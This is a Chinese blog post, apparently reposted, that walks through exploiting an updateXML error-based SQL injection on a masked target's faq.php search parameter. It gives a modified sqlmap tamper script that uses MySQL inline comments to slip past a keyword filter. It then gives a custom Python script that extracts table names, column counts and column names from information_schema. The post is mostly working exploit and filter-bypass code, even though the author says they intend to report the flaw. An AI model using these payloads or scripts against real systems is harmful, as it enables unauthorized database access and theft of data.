updateXML 注入 python 脚本
2017-06-21 23:22
369 查看
用SLQMAP来跑updateXML注入发现拦截关键字,然后内联注入能绕,最后修改halfversionedmorekeywords.py脚本,结果SQLMAP还是跑不出来。>_<
halfversionedmorekeywords.py脚本修改后如下:
自己写个脚本得了,于是有了以下代码,成功跑出表名和字段。
收工,提漏洞。拜拜。
halfversionedmorekeywords.py脚本修改后如下:
#!/usr/bin/env python
import os
import re
from lib.core.common import singleTimeWarnMessage
from lib.core.data import kb
from lib.core.enums import DBMS
from lib.core.enums import PRIORITY
from lib.core.settings import IGNORE_SPACE_AFFECTED_KEYWORDS
__priority__ = PRIORITY.HIGHER
def dependencies():
singleTimeWarnMessage("tamper script '%s' is only meant to be run against %s < 5.1" % (os.path.basename(__file__).split(".")[0], DBMS.MYSQL))
def tamper(payload, **kwargs):
def process(match):
word = match.group('word')
if word.upper() in kb.keywords and word.upper() not in IGNORE_SPACE_AFFECTED_KEYWORDS:
return match.group().replace(word, "/*!12345 %s*/" % word)
else:
return match.group()
retVal = payload
if payload:
retVal = re.sub(r"(?<=\W)(?P<word>[A-Za-z_]+)(?=\W|\Z)", lambda match: process(match), retVal)
retVal = retVal.replace(" /*!0", "/*!0")
return retVal自己写个脚本得了,于是有了以下代码,成功跑出表名和字段。
#coding=utf-8
import requests
import re, binascii, warnings, time
warnings.filterwarnings("ignore")
table_name_list = []
for k in range(1,112):
#遍历表名
url = "https://XXX:6002/customer/faq.php?code=FAQ&category=&" \
"searchopt=content&searchkey=1' /*!and*//*!updateXML*/" \
"(1,concat(0x7e, (select /*!table_name*/ /*!from*/ information_schema.tables limit " + str(k) + ",1),0x7e),3)-- -" \
"&x=4&y=23"
req = requests.get(url)
a = re.findall(r"'~(.*)~'", req.text)
if a:table_name_list.append(a[0])
else:pass
print table_name_list
for i in table_name_list:
print u"表名为:",i #输出表名
#遍历字长度
url = "https://XXX:6002/customer/faq.php?code=FAQ&category=&searchopt=content&searchkey=1" \
"' /*!and*//*!updateXML*/(1,concat(0x7e, " \
"(/*!SELECT*/ /*!distinct*/ concat(0x7e,/*!count(column_name)*/,0x7e) /*!FROM*/ /*!information_schema.columns*/ " \
"where /*!table_name=0x"+str(binascii.b2a_hex(i))+"*/ ),0x7e),3)-- -&x=4&y=23"
req = requests.get(url)
b = re.findall(r"'~(.*)~'",req.text)
if b:
m = int(b[0].strip("~"))+1
print u"行数为:",m #输出行数
for n in range(1,m):
#遍历字段名
url = "https://XXX:6002/customer/faq.php?code=FAQ&category=&searchopt=content&searchkey=1" \
"' /*!and*//*!updateXML*/(1,concat(0x7e, " \
"(/*!SELECT*/ /*!distinct*/ concat(0x7e,/*!column_name*/,0x7e) /*!FROM*/ /*!information_schema.columns*/ " \
"where /*!table_name=0x"+str(binascii.b2a_hex(i))+"*/ limit "+str(n)+",1),0x7e),3)-- -&x=4&y=23"
req = requests.get(url)
c = re.findall(r"'~(.*)~'", req.text)
if c:print u"字段:",str(c).strip("[u'~").strip("~']")
else:pass
else:pass收工,提漏洞。拜拜。
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- C#执行保存在XML属性值里的Python脚本
- python 实现 loadrunner xml脚本格式化
- 批量提取 sitemap.xml 中的链接生成 sitemap.txt (Python脚本)
- python脚本11——.strings文件与excel互转、 xml文件与excel互转
- 利用Python脚本生成sitemap.xml的实现方法
- 报错注入分析之updatexml注入
- 3. Python脚本学习实战笔记三 主流的XML
- 一个python 脚本将XML文件转换到excel
- 学习笔记 UpdateXml() MYSQL显错注入
- 【脚本语言系列】关于Python结构化文本文件处理xml,你需要知道的事
- 【脚本语言系列】关于 Python XML处理,你需要知道的事
- Python开发Svn_Update脚本
- MYSQL updatexml()函数报错注入解析
- python读取xml脚本
- 使用python脚本将XML 电子表格转变为Excel
- 8. Python脚本学习实战笔记八 使用XML-RPC进行文件共享
- 【脚本语言系列】关于Python文本解析XML,你需要知道的事
- 打包python脚本为可执行文件的工具
- Python实现ASP+ACCESS注入,不用SOCKET
- python脚本